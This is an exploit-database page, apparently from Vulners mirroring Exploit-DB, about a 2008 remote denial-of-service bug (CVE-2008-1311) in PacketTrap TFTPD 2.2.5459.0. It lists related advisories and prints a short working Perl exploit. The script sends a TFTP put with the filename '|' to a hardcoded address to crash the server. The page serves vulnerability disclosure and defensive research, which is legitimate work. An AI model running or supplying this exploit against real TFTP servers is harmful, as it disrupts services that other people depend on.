Lucene search
+L

PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service

🗓️ 29 Oct 2008 00:00:00Reported by Jeremy BrownType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

PacketTrap TFTPD Remote Denial of Service vulnerability in version 2.2.5459.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-1311
29 Oct 200800:00
circl
cve
CVE
CVE-2008-1311
12 Mar 200817:00
cve
cvelist
Cvelist
CVE-2008-1311
12 Mar 200817:00
cvelist
metasploit
Metasploit
PacketTrap TFTP Server 2.2.5459.0 DoS
9 Jan 200905:39
metasploit
nvd
NVD
CVE-2008-1311
12 Mar 200817:44
nvd
nessus
Tenable Nessus
PacketTrap pt360 TFTP Server < 1.0.3302.0 Multiple Vulnerabilities
13 Mar 200800:00
nessus
packetstorm
Packet Storm
PacketTrap TFTP Server 2.2.5459.0 Denial of Service
31 Aug 202400:00
packetstorm
prion
Prion
Code injection
12 Mar 200817:44
prion
prion
Prion
Code injection
12 Mar 200817:44
prion
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# PacketTrap TFTPD DoS (latest 2.2.5459.0 tested) -- www.packettrap.com
# Must have Net::TFTP installed (easy to install, 'cpan' then 'install Net::TFTP' ;)
# A product of tftpfuzz.pl (coming soon)

use Net::TFTP;
use Getopt::Std;

$tftp = Net::TFTP->new("192.168.0.112");
$tftp->ascii;
$tftp->put("test", "|");

exit;

# milw0rm.com [2008-10-29]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Oct 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.49167
36